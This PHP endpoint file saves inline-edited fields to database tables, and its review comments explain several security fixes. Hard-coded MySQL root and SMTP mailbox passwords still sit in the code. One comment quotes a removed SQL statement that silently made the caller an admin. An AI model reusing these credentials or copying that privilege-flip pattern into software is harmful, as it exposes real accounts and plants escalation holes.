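<?php
// Inline-edit endpoint: receives {name, pk, value} from the editable widgets
// and stores the value in one column of gs_objects (keyed by imei) or sample
// (keyed by id).  Requires a valid user session (checkUserSession()).
session_start();
include ('../init.php');
include ('../func/fn_common.php');
checkUserSession();
loadLanguage($gsValues['LANGUAGE']);

// NOTE(review): the original echoed print_r($_SESSION) into the response here;
// removed — it disclosed the full session contents to the client.

// Cookie named after, and holding, the session username.  It carries no secret
// and nothing in this file reads it — NOTE(review): confirm a caller needs it,
// otherwise drop it.  86400 = 1 day.
$cookie_name = $_SESSION['username'];
$cookie_value = $_SESSION['username'];
setcookie($cookie_name, $cookie_value, time() + (86400 * 30), "/");

// NOTE(review): root DB credentials are embedded in source.  Rotate the
// password and move the connection settings into the config loaded by
// init.php; the web application should not connect as root at all.
$con = mysqli_connect("localhost", "root", "4c>5:kxUd8YN8,LK", "gs");
if (!$con) {
    error_log('editable endpoint: db connect failed: ' . mysqli_connect_error());
    die('Database unavailable');
}

// Widget name -> (table, key column, value column).  Identifiers come only
// from this map, never from the request; key and value are bound parameters.
// The original truncated $_POST['name'] to 6 characters before comparing it,
// so 'comments', 'country' and 'options' could never match — fixed by matching
// the full name against this whitelist instead.
$fields = array(
    'notice'   => array('gs_objects', 'imei', 'notice'),
    'status'   => array('gs_objects', 'imei', 'status'),
    'comments' => array('sample', 'id', 'comments'),
    'country'  => array('sample', 'id', 'country_name'),
    'dob'      => array('sample', 'id', 'dob'),
    'appt'     => array('sample', 'id', 'appt'),
    'combo'    => array('sample', 'id', 'combo_appt'),
    'email'    => array('sample', 'id', 'email'),
    'options'  => array('sample', 'id', 'options'),
    'wy'       => array('sample', 'id', 'wy_text'),
);

$name  = isset($_POST['name'])  ? (string) $_POST['name']  : '';
$pk    = isset($_POST['pk'])    ? (string) $_POST['pk']    : '';
$value = isset($_POST['value']) ? (string) $_POST['value'] : '';

if ($name === 'wy') {
    // The wy_text column is stored HTML-escaped, as before.
    $value = htmlspecialchars($value);
}

// NOTE(review): the original 'notice' and 'status' handlers additionally ran
//   UPDATE gs_users SET user_flag=0, admin_flag=1 WHERE username=<session user>
// (notice) and the reverse (status): saving an object's notice made the caller
// an admin, saving its status revoked it.  Nothing in this file justifies
// changing the caller's privileges as a side effect of editing an object field,
// so that statement has been removed.  If a privilege change is genuinely
// required it belongs in a dedicated, authorised admin endpoint.

if ($pk !== '' && isset($fields[$name])) {
    list($table, $keyCol, $valCol) = $fields[$name];
    upsertField($con, $table, $keyCol, $valCol, $pk, $value);
}

/**
 * Insert a row ($keyCol = $key, $valCol = $value) when none exists for $key,
 * otherwise update $valCol of the existing row.
 *
 * $table, $keyCol and $valCol are interpolated as identifiers and MUST come
 * from the $fields whitelist above; $key and $value are bound as parameters so
 * request data never reaches the SQL text.  Dies via dbFail() on any failure.
 */
function upsertField($con, $table, $keyCol, $valCol, $key, $value)
{
    $sel = mysqli_prepare($con, "SELECT COUNT(*) FROM `$table` WHERE `$keyCol` = ?");
    if (!$sel || !mysqli_stmt_bind_param($sel, 's', $key) || !mysqli_stmt_execute($sel)) {
        dbFail($con, 'count');
    }
    $count = 0;
    mysqli_stmt_bind_result($sel, $count);
    mysqli_stmt_fetch($sel);
    mysqli_stmt_close($sel);

    if ((int) $count === 0) {
        $stmt = mysqli_prepare($con, "INSERT INTO `$table` (`$keyCol`, `$valCol`) VALUES (?, ?)");
        $ok = $stmt && mysqli_stmt_bind_param($stmt, 'ss', $key, $value) && mysqli_stmt_execute($stmt);
    } else {
        $stmt = mysqli_prepare($con, "UPDATE `$table` SET `$valCol` = ? WHERE `$keyCol` = ?");
        $ok = $stmt && mysqli_stmt_bind_param($stmt, 'ss', $value, $key) && mysqli_stmt_execute($stmt);
    }
    if (!$ok) {
        dbFail($con, 'write');
    }
    mysqli_stmt_close($stmt);
}

/**
 * Log the database error server-side and stop with a generic message.
 * The original did `die(mysqli_error())`, which both called mysqli_error()
 * without its link argument and sent the raw DB error to the client.
 */
function dbFail($con, $stage)
{
    error_log('editable endpoint: ' . $stage . ' failed: ' . mysqli_error($con));
    die('Database error');
}

/**
 * E-mail a "check report" for the current session user to the support list.
 * Not called from this file; kept for callers elsewhere.  On success sets
 * $_SESSION["send"] = "green"; on failure echoes the mailer error.
 */
function sendnotification()
{
    date_default_timezone_set('Etc/UTC');
    // require_once: a second call must not redeclare the PHPMailer classes.
    require_once 'PHPMailerAutoload.php';

    $mail = new PHPMailer;
    $mail->isSMTP();
    // Debug output is written straight into the HTTP response (Debugoutput =
    // 'html').  The original used level 2, which prints the whole SMTP dialogue
    // including the AUTH exchange to the client; it stays off in production.
    $mail->SMTPDebug = 0;
    $mail->Debugoutput = 'html';
    $mail->Host = "mail.henditech.com";
    $mail->Port = 25;
    $mail->SMTPAuth = true;
    $mail->Username = "event@henditech.com";
    // NOTE(review): mailbox password embedded in source — rotate it and load it
    // from configuration; no TLS is configured for this SMTP session either.
    $mail->Password = "123@321";
    $mail->setFrom('event@henditech.com', 'henditech');
    $mail->addReplyTo('support@henditech.com', 'henditech');

    // Add every recipient, then send once.  The original called send() inside
    // the loop, so earlier recipients received one copy per later recipient.
    $maillists = array('support@henditech.com', 'agohary@henditech.com');
    foreach ($maillists as $maillist) {
        $mail->addAddress($maillist, $maillist);
    }

    $who = isset($_SESSION['username']) ? $_SESSION['username'] : '';
    $mail->Subject = 'check report from ' . $who;
    $mail->msgHTML('check report from client : ' . $who);
    $mail->AltBody = '';

    if (!$mail->send()) {
        echo "Mailer Error: " . $mail->ErrorInfo;
    } else {
        $_SESSION["send"] = "green";
    }
}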